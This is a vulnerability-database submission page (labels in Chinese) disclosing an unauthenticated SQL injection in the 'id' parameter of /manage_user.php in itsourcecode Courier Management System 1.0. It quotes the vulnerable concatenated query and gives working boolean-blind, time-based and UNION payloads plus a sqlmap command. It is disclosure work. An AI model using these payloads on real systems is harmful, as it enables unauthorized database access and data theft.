| 标题 | itsourcecode Courier Management System 1.0 SQL Injection |
|---|
| 描述 | A SQL injection vulnerability was found in itsourcecode Courier
Management System 1.0. The vulnerability exists in the file
/manage_user.php at line 5. The manipulation of the argument "id"
via GET parameter leads to SQL injection. No authentication is
required to exploit this vulnerability. The attack may be launched
remotely.
Vulnerable code:
$user = $conn->query("SELECT * FROM users where id =".$_GET['id']);
The file /manage_user.php contains no session check or login
verification before processing user input.
Tested injection types:
1. Boolean-based blind:
id=(SELECT (CASE WHEN (1679=1679) THEN 1 ELSE (SELECT 2926 UNION SELECT 3592) END))
2. Time-based blind (5 second delay confirmed):
id=1 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))VRZs)
3. UNION query (8 columns):
id=-7753 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7a71,0x75426f454f47726f6659416e4d424474484a69636e4569694d674b6c4c47705145566572516f4c53,0x7171627871),NULL,NULL,NULL,NULL-- -
Verified using sqlmap:
sqlmap --random-agent --batch -u "http://target/manage_user.php?id=1" --dbms=mysql --current-db.
I have already informed the supplier about the relevant loopholes. |
|---|
| 来源 | ⚠️ https://lhzzz08.github.io/posts/cveapplication3/ |
|---|
| 用户 | zzl08 (UID 93909) |
|---|
| 提交 | 2026-05-02 17時11分 (1 月前) |
|---|
| 管理 | 2026-05-26 18時16分 (24 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 365679 [itsourcecode Courier Management System 1.0 /manage_user.php 标识符 SQL注入] |
|---|
| 积分 | 20 |
|---|